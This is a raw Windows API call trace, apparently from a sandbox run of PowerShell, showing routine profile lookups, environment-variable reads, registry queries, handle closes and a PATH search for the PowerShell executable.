	[0432.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0432.587] SetErrorMode (uMode=0x1) returned 0x1
	[0432.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d7e0 | out: lpFileInformation=0x26d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.588] SetErrorMode (uMode=0x1) returned 0x1
	[0432.588] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.588] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.588] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.588] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.589] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.589] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.589] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.589] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.590] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.590] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.591] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.591] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.592] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0432.592] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26d9c0 | out: lpMode=0x26d9c0) returned 1
	[0432.593] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.593] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.595] SetEvent (hEvent=0x304) returned 1
	[0432.595] SetEvent (hEvent=0x1c8) returned 1
	[0432.596] SetEvent (hEvent=0x1c4) returned 1
	[0432.596] SetEvent (hEvent=0x34c) returned 1
	[0432.597] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0432.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.597] CoTaskMemFree (pv=0x1b9a98c0) 
	[0432.597] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d718 | out: phkResult=0x26d718*=0x390) returned 0x0
	[0432.597] RegQueryValueExW (in: hKey=0x390, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d69c, lpData=0x0, lpcbData=0x26d698*=0x0 | out: lpType=0x26d69c*=0x0, lpData=0x0, lpcbData=0x26d698*=0x0) returned 0x2

Thread:
	id = 210
	os_tid = 0xc18


Thread:
	id = 232
	os_tid = 0xcc0


Thread:
	id = 575
	os_tid = 0x9a0


Thread:
	id = 577
	os_tid = 0x8d4


Thread:
	id = 579
	os_tid = 0x113c


Thread:
	id = 581
	os_tid = 0xd40


Thread:
	id = 582
	os_tid = 0xcf0

	[0402.505] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0429.612] LocalFree (hMem=0xc72c0) returned 0x0
	[0429.612] CloseHandle (hObject=0x318) returned 1
	[0429.612] CloseHandle (hObject=0x13) returned 1
	[0429.613] CloseHandle (hObject=0xf) returned 1
	[0429.614] RegCloseKey (hKey=0x304) returned 0x0
	[0429.614] RegCloseKey (hKey=0x300) returned 0x0
	[0429.614] RegCloseKey (hKey=0x2fc) returned 0x0
	[0429.614] LocalFree (hMem=0xc7290) returned 0x0
	[0429.614] RegCloseKey (hKey=0x328) returned 0x0
	[0431.318] RegCloseKey (hKey=0x334) returned 0x0
	[0431.318] RegCloseKey (hKey=0x330) returned 0x0
	[0431.318] RegCloseKey (hKey=0x32c) returned 0x0
	[0431.319] RegCloseKey (hKey=0x318) returned 0x0
	[0431.319] RegCloseKey (hKey=0x304) returned 0x0
	[0431.319] RegCloseKey (hKey=0x34c) returned 0x0
	[0431.319] RegCloseKey (hKey=0x1c4) returned 0x0
	[0431.319] RegCloseKey (hKey=0x1c8) returned 0x0
	[0431.320] RegCloseKey (hKey=0x378) returned 0x0
	[0431.320] RegCloseKey (hKey=0x36c) returned 0x0
	[0431.320] RegCloseKey (hKey=0x368) returned 0x0
	[0431.320] RegCloseKey (hKey=0x364) returned 0x0
	[0431.320] RegCloseKey (hKey=0x360) returned 0x0
	[0431.321] RegCloseKey (hKey=0x35c) returned 0x0
	[0431.321] RegCloseKey (hKey=0x358) returned 0x0
	[0431.321] RegCloseKey (hKey=0x354) returned 0x0
	[0431.321] RegCloseKey (hKey=0x350) returned 0x0
	[0431.322] RegCloseKey (hKey=0x374) returned 0x0
	[0431.322] RegCloseKey (hKey=0x340) returned 0x0
	[0431.322] RegCloseKey (hKey=0x33c) returned 0x0
	[0431.322] RegCloseKey (hKey=0x338) returned 0x0
	[0431.323] RegCloseKey (hKey=0x1c0) returned 0x0

Thread:
	id = 678
	os_tid = 0x152c


Thread:
	id = 683
	os_tid = 0x1560

	[0433.296] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0433.301] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0433.306] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.306] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.308] VirtualQuery (in: lpAddress=0x1c9dd900, lpBuffer=0x1c9de7c0, dwLength=0x30 | out: lpBuffer=0x1c9de7c0*(BaseAddress=0x1c9dd000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.311] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.311] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.314] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.314] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.318] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.318] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.328] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.328] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.331] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.331] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.332] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.333] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.337] VirtualQuery (in: lpAddress=0x1c9ddbb0, lpBuffer=0x1c9dea70, dwLength=0x30 | out: lpBuffer=0x1c9dea70*(BaseAddress=0x1c9dd000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.338] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.338] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.794] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.794] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.794] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.795] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.796] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.796] CoTaskMemFree (pv=0x1b9a98c0) 
	[0433.800] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0433.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.800] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.000] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.000] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.002] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.002] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.003] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.004] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.006] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.006] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.008] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.008] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.009] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.009] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.011] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.011] CoTaskMemFree (pv=0x1b9a98c0) 
	[0435.764] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0435.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.764] CoTaskMemFree (pv=0x1b9a98c0) 
	[0436.746] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0436.746] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0436.746] CoTaskMemFree (pv=0x1b9a98c0) 
	[0436.749] CoTaskMemAlloc (cb=0x104) returned 0x1b9a98c0
	[0436.749] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b9a98c0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0436.749] CoTaskMemFree (pv=0x1b9a98c0) 
	[0436.749] CoTaskMemAlloc (cb=0x128) returned 0x1b9d6b50
	[0436.749] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b9d6b50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0436.749] CoTaskMemFree (pv=0x1b9d6b50) 
	[0436.753] CoTaskMemAlloc (cb=0x20e) returned 0x1b9960a0
	[0436.753] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b9960a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0436.754] CoTaskMemFree (pv=0x1b9960a0) 
	[0436.757] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0436.758] SetErrorMode (uMode=0x1) returned 0x1
	[0436.761] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0436.771] SetErrorMode (uMode=0x1) returned 0x1
	[0437.444] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.444] SetErrorMode (uMode=0x1) returned 0x1
	[0437.444] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.452] SetErrorMode (uMode=0x1) returned 0x1
	[0437.453] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.453] SetErrorMode (uMode=0x1) returned 0x1
	[0437.453] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.461] SetErrorMode (uMode=0x1) returned 0x1
	[0437.463] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.463] SetErrorMode (uMode=0x1) returned 0x1
	[0437.463] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.471] SetErrorMode (uMode=0x1) returned 0x1
	[0437.473] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.473] SetErrorMode (uMode=0x1) returned 0x1
	[0437.473] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.481] SetErrorMode (uMode=0x1) returned 0x1
	[0437.482] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.482] SetErrorMode (uMode=0x1) returned 0x1
	[0437.482] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.896] SetErrorMode (uMode=0x1) returned 0x1
	[0437.898] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.898] SetErrorMode (uMode=0x1) returned 0x1
	[0437.898] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.906] SetErrorMode (uMode=0x1) returned 0x1
	[0437.908] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.908] SetErrorMode (uMode=0x1) returned 0x1
	[0437.908] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.963] SetErrorMode (uMode=0x1) returned 0x1
	[0437.965] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.965] SetErrorMode (uMode=0x1) returned 0x1
	[0437.965] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.973] SetErrorMode (uMode=0x1) returned 0x1
	[0438.332] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.332] SetErrorMode (uMode=0x1) returned 0x1
	[0438.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.340] SetErrorMode (uMode=0x1) returned 0x1
	[0438.341] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.342] SetErrorMode (uMode=0x1) returned 0x1
	[0438.342] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.349] SetErrorMode (uMode=0x1) returned 0x1
	[0438.351] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.351] SetErrorMode (uMode=0x1) returned 0x1
	[0438.351] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c9ddae0 | out: lpFindFileData=0x1c9ddae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.359] SetErrorMode (uMode=0x1) returned 0x1
	[0438.360] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9dd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.360] SetErrorMode (uMode=0x1) returned 0x1
